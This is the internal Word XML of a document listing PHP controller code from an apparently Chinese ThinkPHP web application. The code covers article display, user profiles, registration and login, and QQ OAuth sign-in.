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F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235B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115ED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init'     =&gt; [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8AD6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begin'    =&gt; [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4D2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dule_init'  =&gt; [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE157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tion_begin' =&gt; [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E3C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filter'  =&gt; [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2489A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g_write'    =&gt; [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5084C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end'      =&gt; [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113708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tion_log'=&gt;[</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073D3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behavior\ActionLog',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524C0A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40FB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9EE5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6968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58E63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index\controller\Common;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1341F5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462FB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44540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 extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F06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CD37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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2835E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3821F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E97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CF3DF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2C4E8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0F06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ew(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068A1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input('?id')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FA9F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_webfig('url'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBF5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FBC3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51989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7171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_webfig('url'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAE9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2113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rticle')-&gt;where(['id'=&gt;$id])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EA81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4683E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内容不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5E98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FA1D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hide']==0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5645E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内容不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521CFC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1CC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hide']==2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CBE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正在审核，无法查看</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9E9C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EC0E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hide']==3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE30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未通过，无法查看</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F018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CD1D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gt;$id,'hide'=&gt;1])-&gt;setInc('click');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FB8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content']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473D2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src=\"(.*?)\"/", stripslashes($name['content']),$content);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11339F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ontent[2] as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046C5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strstr($v,'http')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1344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strpos($v,'/public/uploads/us/') !== false){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A32C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8813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content']=str_replace($v,_imgUrl().$v,stripslashes($name['content']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F1D1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802AC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A852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676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mychannel']==2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E36A9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p>
    <w:p w14:paraId="32029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eitoutiao']==0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2781B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json_decode($name['images'],true) as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DE1E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lt;p class="a-image"&gt;&lt;img src="'._imgUrl().$v['img'].'"&gt;&lt;/p&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02468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lt;p class="a-image"&gt;'.$v['img_text'].'&lt;/p&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F20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3861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00E1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images']=htmlspecialchars_decode($name['images']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681B46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images']=json_decode($name['images'],true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795DA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name['images'] as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F248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_array($v)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C60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v['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46103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62874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lt;p class="a-image"&gt;&lt;img src="'._imgUrl().$v.'"&gt;&lt;/p&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0901A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2F6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C95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content']="&lt;p&gt;".$name['description']."&lt;/p&gt;".$content;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9D4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name['mychannel']==3 || $name['mychannel']==4){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBAAB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mychannel']==3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40433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name['image'] ? $name['image'] : $name['video']."?vframe/jpg/offset/2/w/400/h/400";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB8A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3FD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name['image'] ? $name['image'] : $name['video']."?vframe/jpg/offset/2/w/400/h/700";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782CE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D69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_imgUrl().$videoimages;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3960F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videoimages',$videoimages);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5856F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C69D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b::name('member')-&gt;where('id',$name['uid'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508C9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user);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D34E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b::name('article_ping')-&gt;where('aid',$id)-&gt;order('time desc')-&gt;limit(20)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E4D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 as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567F85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v['uid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75234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k]['img']=_imgUrl().$user['img']."?imageView2/1/w/100/h/100";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657C38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k]['username']=$user['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A27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08F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ing',$ping);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0937AC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7D24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 = Db::name('ad')-&gt;where(['hide' =&gt; 1,'device'=&gt;0])-&gt;order('rand()')-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A04F0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d',$ad);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9DF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9FE6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E28F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ser(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9B87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input('?id')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA208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_webfig('url'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2639C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0428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67A581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36D79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_webfig('url'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D397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74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session()){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1F20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member();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11204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9FD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id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F5FC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hide']==0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEFB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已被禁止</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3D67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user['hide']==3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C0F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正在审核</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EAB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user['hide']==2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C02E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正在审核</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16710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482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guanzhu']=Db::name('member_guanzhu')-&gt;where(['uid'=&gt;$user['id']])-&gt;count();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D443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fensi']=Db::name('member_guanzhu')-&gt;where(['gz_uid'=&gt;$user['id']])-&gt;count();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC3D0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user); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1BD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20E2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1D0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yaoqing(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5953E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input('uid/d');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02384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id',$uid); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438B10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okie('?code')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49015D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cookie('code')-time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54790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de',$code); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B40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87E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A097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2C3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rweima(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268B2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input('uid/d');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BC1D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index/m/yaoqing',['uid'=&gt;$uid],'',true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D30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https:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16004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rl',$url); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235DA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A556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A05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ongbaoapp(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFD0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8C44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45B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640B5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B8C5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233D86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Controller;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A624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766A42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mmon extends Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657D2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D5CB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9F31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D5998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namespace app\index\controller;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314023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index\controller\Common;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A8C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9A17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21918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67904F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26537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6C06C4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5AB510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User extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F58E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0176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5E049C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  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E1A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EBCB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   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF784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51926A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906C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_webfig('url'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13245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A46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session()){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6281A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member();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24079E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52C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id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293FB8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hide']==0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C875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已被禁止</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB537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user['hide']==3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49120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正在审核</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AC0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user['hide']==2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9D1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该账户正在审核</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B67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286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session()){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C880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guanzhu']=Db::name('member_guanzhu')-&gt;where(['uid'=&gt;$member['id'],'gz_uid'=&gt;$user['id']])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38897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D0D2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guanzhu']=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7123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629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ongtai']=Db::name('member_guanzhu')-&gt;where(['uid'=&gt;$id])-&gt;count();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF0D0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fensi']=Db::name('member_guanzhu')-&gt;where(['gz_uid'=&gt;$id])-&gt;count();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547BC7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user);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9D42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4AFF0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34CB5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77C35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Db::name('member')-&gt;field('id,img,mobile,nickname')-&gt;where($where)-&gt;limit(6)-&gt;order('rand()')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B46D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hannel as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082C3C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nickname']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24225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username']=$v['nickname'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C7CA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obile']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC32F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mobile']=$v['mobile'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0A5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DC0F4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mobile']='';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E60A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nickname']='';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6644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img']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A628A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img']='/public/style/index/member/img/userimg.gif';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415ED6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501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k]['img']=_imgurl().$v['img'].'?imageView2/1/w/55/h/55';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11900C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4A19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B107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hannel',$channel);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316E4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ED30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C4EE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ogin(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30ED64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ssion::has('user','ffxiangUser')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E32A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member/index");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18051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3DA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select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CBD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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085276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E86C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v['name'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749E64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v['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B80D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v['content'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C25B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v['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504E4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2AFF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nfig',$config);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77922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3C7B7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switch']['text'] || $config['switch']==0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C4C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会员未开放</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F554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BA7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user=$config['reguser']['text'] ? '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户名</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/' : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6156B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mobile=$config['regmobile']['text'] ? '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>手机</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/' : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57167E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email=$config['regemail']['text'] ? '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>邮箱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/' : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FCC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reguser.$regmobile.$regemail;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416FFF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rtrim($username, "/");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B421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name',$username);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197BC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instance()-&gt;isPost()){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3BB4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input('token') ? input('token') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369937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_decrypt($token)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFA2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4E437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登录失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9610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1270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63E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set('user',$token,'ffxiangUser');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5215AC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gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>登录成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24958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FBBA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F1FA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846D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6FE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g(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC927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ssion::has('user','ffxiangUser')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFA8D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member/index");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D231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5B06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select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD3BB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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BD2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68197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v['name'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A64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v['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A000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v['content'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA17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v['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FA66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4313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nfig',$config);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675BAE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434E27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switch']['text'] || $config['switch']['text']==0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284A3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未开放会员系统</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4184C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6A36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regmobile']['text'] &amp;&amp; !$config['regemail']['text'] &amp;&amp; !$config['reguser']['text']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB89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用户名、手机、邮箱，至少要开放一个</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C2C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91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user=$config['reguser']['text'] ? '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户名</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/' : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD95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mobile=$config['regmobile']['text'] ? '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>手机</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/' : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698EC6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email=$config['regemail']['text'] ? '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>邮箱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/' : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25518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reguser.$regmobile.$regemail;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445A4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rtrim($username, "/");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AFB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name',$username);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB23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EB460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DE8D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ssword(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CED6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ssion::has('user','ffxiangUser')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB9C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member/index");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72495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CC9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select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21717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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1860A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4EFF99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v['name'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA544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v['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653CBA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v['content'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C1A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v['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F6F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8A2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nfig',$config);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138AD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50873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switch']['text'] || $config['switch']['text']==0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8089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未开放会员系统</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773452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6F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regmobile']['text'] &amp;&amp; !$config['regemail']['text']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BAB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手机、邮箱，至少要开放一个</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143F4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B4C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mobile=$config['regmobile']['text'] ? '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>手机</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/' : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087F3A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email=$config['regemail']['text'] ? '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>邮箱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/' : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E92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regmobile.$regemail;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B3E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name',rtrim($username, "/"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579BB9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this-&gt;fetch();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C29C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3D57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qqLogin(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4D8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request()-&gt;root(true).'/'.request()-&gt;path();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605298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rect_uri = urlencode($url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA3D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type','qqLogin')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3752C3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config['0']['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D11E7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secret =  $config['1']['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F46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SESSION['state'] = md5(uniqid(rand(), TRUE));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652BB1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_GET['code']) &amp;&amp; !isset($_SESSION['code'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58430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https:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E475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url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322FF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5040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94B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_GET['code']) &amp;&amp; !isset($_SESSION['token'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6CFE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SESSION['code'] = $_GET['code'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735F4A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https:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B448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p;client_secret=".$appsecret."&amp;code=".$_GET['code']."&amp;grant_type=authorization_code"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04455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p;state=".$_SESSION['state']."&amp;redirect_uri=".$redirect_uri;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730ED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file_get_contents($url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA89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access_token=(.*?)\&amp;/', $res, $res);</w:t>
      </w:r>
    </w:p>
